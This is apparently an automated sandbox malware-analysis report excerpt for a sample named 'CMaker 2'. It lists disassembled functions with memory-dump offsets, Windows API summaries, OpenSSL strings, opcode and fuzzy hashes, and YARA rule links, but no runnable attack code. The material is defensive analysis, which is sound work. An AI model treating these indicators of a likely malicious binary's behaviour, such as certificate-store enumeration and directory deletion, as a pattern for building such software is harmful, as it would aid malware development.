                                                                                                                                                                                  • Associated: 00000005.00000002.2266200300.00007FFD9DFBA000.00000080.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266247225.00007FFD9DFBC000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9df90000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007A43319ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 212611557-0
                                                                                                                                                                                  • Opcode ID: 44f78894ab1dd93fe187eda2e0f81837f84e621f6ab168d0c6ac93df99fa4251
                                                                                                                                                                                  • Instruction ID: 5f6cb0002235e962190199acb48f7a8fb301089dcfe3d3de527a0ed189bc4f6e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 44f78894ab1dd93fe187eda2e0f81837f84e621f6ab168d0c6ac93df99fa4251
                                                                                                                                                                                  • Instruction Fuzzy Hash: E9311C76709AC18AEB709FE0E8513E973A1FB84744F44453ADA8D47A98FF78D548C710
                                                                                                                                                                                  Function 00007FFD93483058 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2263462576.00007FFD93481000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FFD93480000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2263419318.00007FFD93480000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD934E2000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD9352E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD93531000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD93536000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD93590000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD93593000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD93595000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2263462576.00007FFD93598000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264210337.00007FFD93599000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264282200.00007FFD9359B000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd93480000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007A43319ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 212611557-0
                                                                                                                                                                                  • Opcode ID: d5821aaf4936ad9aa18e348792a4e6496cc638c229f42c96d8f2983ca85ed40f
                                                                                                                                                                                  • Instruction ID: 18631bae99e1b9e3481645e35998dfb5f4bdfe06f9da2b1a21c46cde70fb2720
                                                                                                                                                                                  • Opcode Fuzzy Hash: d5821aaf4936ad9aa18e348792a4e6496cc638c229f42c96d8f2983ca85ed40f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 49314F76709B8186EB709FA0E8603ED7378FB85744F454039DA4EA7A98DF38D548CB00
                                                                                                                                                                                  Function 00007FFD935B7630 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 357COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: 00007B2246570
                                                                                                                                                                                  • String ID: ..\s\ssl\ssl_ciph.c$SECLEVEL=$STRENGTH$ssl_cipher_process_rulestr
                                                                                                                                                                                  • API String ID: 511975427-331183818
                                                                                                                                                                                  • Opcode ID: 84b29b3f3c5a8ddb94d30c590e50ba50e9e9283ac966815b6dbbe67d5f37e6b5
                                                                                                                                                                                  • Instruction ID: 68678667788ada7a826d6f4bdc5565767c9a92a50bb583cb3b0d2daf13eefddb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 84b29b3f3c5a8ddb94d30c590e50ba50e9e9283ac966815b6dbbe67d5f37e6b5
                                                                                                                                                                                  • Instruction Fuzzy Hash: D9E1A472B0C6428AF7F28EA5946077A67F9FF48784F105035EA5D67AA4DB3CE941CB00
                                                                                                                                                                                  Function 00007FF6FABE6B80 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                  • String ID: %s\*
                                                                                                                                                                                  • API String ID: 1057558799-766152087
                                                                                                                                                                                  • Opcode ID: b1bbed1cfb60f4f0fc8f81c34b93851b936e7686d1867c24e24cc6b5744ead1d
                                                                                                                                                                                  • Instruction ID: e2c0f25f5076c5409287d8e48269d475fa46c619c7e9588e876b3a64e4750f28
                                                                                                                                                                                  • Opcode Fuzzy Hash: b1bbed1cfb60f4f0fc8f81c34b93851b936e7686d1867c24e24cc6b5744ead1d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 40413E61A0CA4281EB609B24E4A42B97360FB95754F8046B2E9BEC37D4FF3CE54AC700
                                                                                                                                                                                  Function 00007FFD935A2135 Relevance: 10.6, APIs: 7, Instructions: 73COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                                  • Opcode ID: a32b81c2ff6dfccb19a9728fe67c5763d4d0aea259f9004b58da64eb6530d66a
                                                                                                                                                                                  • Instruction ID: cf3be6a95c6f30d500e3723aa723d41fa69aa17fd93cf5c31c679511330c82e6
                                                                                                                                                                                  • Opcode Fuzzy Hash: a32b81c2ff6dfccb19a9728fe67c5763d4d0aea259f9004b58da64eb6530d66a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F313972B09B818AEB709FE0E8603E97368FB84744F44443ADA9E57A98DF3CD548C700
                                                                                                                                                                                  Function 00007FFD9DFD3438 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2266399755.00007FFD9DFC1000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFD9DFC0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2266316234.00007FFD9DFC0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266399755.00007FFD9DFDA000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266399755.00007FFD9DFE2000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266691733.00007FFD9DFE3000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266751869.00007FFD9DFE5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9dfc0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                                  • Opcode ID: 79c755f0fa8e702774278d76ad584c934338be1500de2b5779589135aa72a969
                                                                                                                                                                                  • Instruction ID: 489f9d77b71616ecc5ecc61c34ddd4e2ae07ee9d7153c5ef54e42180d2e83bfe
                                                                                                                                                                                  • Opcode Fuzzy Hash: 79c755f0fa8e702774278d76ad584c934338be1500de2b5779589135aa72a969
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6631FA62709AC185EB709FA0E8553ED73A4FB84744F44463ADB8E47A98EF3CD6488710
                                                                                                                                                                                  Function 00007FFD9F3B2FF8 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2266983474.00007FFD9F3B1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD9F3B0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2266842106.00007FFD9F3B0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3D0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3D9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3DD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2267323992.00007FFD9F3E0000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2267409295.00007FFD9F3E2000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9f3b0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                                  • Opcode ID: 95a6715441451f332765c81f1ec3e8738af08fa5e0456622ef6d16990be337b9
                                                                                                                                                                                  • Instruction ID: 94b7fbcc381c2e0490bcff71b6c1e367fa797eb19c44e9cbc754187a125278a1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 95a6715441451f332765c81f1ec3e8738af08fa5e0456622ef6d16990be337b9
                                                                                                                                                                                  • Instruction Fuzzy Hash: E9311C72709A8185EB70AFA0E8603FA7365FB84745F44443EDA4E4BA99DF3CD649C710
                                                                                                                                                                                  Function 00007FF6FABEB59C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3140674995-0
                                                                                                                                                                                  • Opcode ID: dec8059712e99081e2e259c55c2c48a2db8476306f1af611de12d5d4c368715b
                                                                                                                                                                                  • Instruction ID: 0045311956e5186c29c67de8a5ab8b0c4e4de97af8b213559da2212c99dbf03d
                                                                                                                                                                                  • Opcode Fuzzy Hash: dec8059712e99081e2e259c55c2c48a2db8476306f1af611de12d5d4c368715b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 72312FB2618B818AEB60DF60E8943EA7374FB95744F44807ADA5E87B94EF38D548C710
                                                                                                                                                                                  Function 00007FF6FAC05B00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6FAC05B45
                                                                                                                                                                                    • Part of subcall function 00007FF6FAC05498: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAC054AC
                                                                                                                                                                                    • Part of subcall function 00007FF6FABFA0E4: RtlFreeHeap.NTDLL(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA0FA
                                                                                                                                                                                    • Part of subcall function 00007FF6FABFA0E4: GetLastError.KERNEL32(?,?,?,00007FF6FAC02B22,?,?,?,00007FF6FAC02B5F,?,?,00000000,00007FF6FAC03025,?,?,?,00007FF6FAC02F57), ref: 00007FF6FABFA104
                                                                                                                                                                                    • Part of subcall function 00007FF6FABFA4C4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6FABFA4A3,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFA4CD
                                                                                                                                                                                    • Part of subcall function 00007FF6FABFA4C4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6FABFA4A3,?,?,?,?,?,00007FF6FABFA38E), ref: 00007FF6FABFA4F2
                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6FAC05B34
                                                                                                                                                                                    • Part of subcall function 00007FF6FAC054F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FAC0550C
                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6FAC05DAA
                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6FAC05DBB
                                                                                                                                                                                  • _get_daylight.LIBCMT ref: 00007FF6FAC05DCC
                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6FAC0600C), ref: 00007FF6FAC05DF3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4070488512-0
                                                                                                                                                                                  • Opcode ID: 656f46ad94b1de9c6b7be9e0428065307f6ee6306168047b2f363e6a295c7c06
                                                                                                                                                                                  • Instruction ID: 574d03f9573c635930e5239bb9b16b5f15e172ee570f051b444e3a155a97edbd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 656f46ad94b1de9c6b7be9e0428065307f6ee6306168047b2f363e6a295c7c06
                                                                                                                                                                                  • Instruction Fuzzy Hash: 97D1E0A6A1824686EB20DF25D4901B967B8FF84B84F84E076EA6DC76D5FF3CE441C740
                                                                                                                                                                                  Function 00007FF6FABFA1D8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1239891234-0
                                                                                                                                                                                  • Opcode ID: 18bd89ddc904fac5e08f82f97f687fabcb8e5781267cf91c135aead5cf591e4d
                                                                                                                                                                                  • Instruction ID: 282429c43bfb8495d300850a47afc26408b8fa51c429091b6638823b427b164c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 18bd89ddc904fac5e08f82f97f687fabcb8e5781267cf91c135aead5cf591e4d
                                                                                                                                                                                  • Instruction Fuzzy Hash: A9319176618F8186DB60CF25E8402AE73B4FB89754F544179EAAD83B98EF3CC545CB00
                                                                                                                                                                                  Function 00007FFD935A1CC1 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 292COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2264373753.00007FFD935A1000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFD935A0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2264326565.00007FFD935A0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93623000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93625000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD9364D000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93658000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264373753.00007FFD93663000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264633569.00007FFD93667000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2264772265.00007FFD93668000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd935a0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: ..\s\ssl\statem\statem_srvr.c$construct_stateful_ticket$resumption$tls_construct_new_session_ticket
                                                                                                                                                                                  • API String ID: 0-1194634662
                                                                                                                                                                                  • Opcode ID: 72ef1a0d099f6e64caee48e151b3fdafe4a252f0948802915178ad43b1f83a31
                                                                                                                                                                                  • Instruction ID: e714a4371eeae393fda0a822b9479c2ba96c941cfbf10fd9110f0fe33fd25425
                                                                                                                                                                                  • Opcode Fuzzy Hash: 72ef1a0d099f6e64caee48e151b3fdafe4a252f0948802915178ad43b1f83a31
                                                                                                                                                                                  • Instruction Fuzzy Hash: 36D19036B0868285FB60DBE5D8606ED6B68EB89B84F480036DE5CA7796DF7CE541C310
                                                                                                                                                                                  Function 00007FF6FAC01674 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2261013560.00007FF6FABE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF6FABE0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2260990879.00007FF6FABE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261040109.00007FF6FAC0B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC1E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261107873.00007FF6FAC23000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2261214815.00007FF6FAC2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6fabe0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2227656907-0
                                                                                                                                                                                  • Opcode ID: dcffd9b8628d742c69489f875bc55e6d9247fa9d8bf2a4278b728192fca35700
                                                                                                                                                                                  • Instruction ID: 322b19d1c11ebc6131e38ace58e48e1b45154e7484a475e23d55f8037a77ad21
                                                                                                                                                                                  • Opcode Fuzzy Hash: dcffd9b8628d742c69489f875bc55e6d9247fa9d8bf2a4278b728192fca35700
                                                                                                                                                                                  • Instruction Fuzzy Hash: F5B1D5A6B1868281EB64DB65E4001BAA3B0EF44FE4F44A275DA6DC7BC5FE3CE541C300
                                                                                                                                                                                  Function 00007FFD9F3BA0E8 Relevance: 7.7, APIs: 5, Instructions: 173encryptionCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.2266983474.00007FFD9F3B1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD9F3B0000, based on PE: true
                                                                                                                                                                                  • Associated: 00000005.00000002.2266842106.00007FFD9F3B0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3D0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3D9000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2266983474.00007FFD9F3DD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2267323992.00007FFD9F3E0000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000005.00000002.2267409295.00007FFD9F3E2000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9f3b0000_CMaker 2.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Cert$Store$ErrorLast$00007CertificateCertificatesCloseContextEnhancedEnumFreeOpenUsage
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1905439668-0
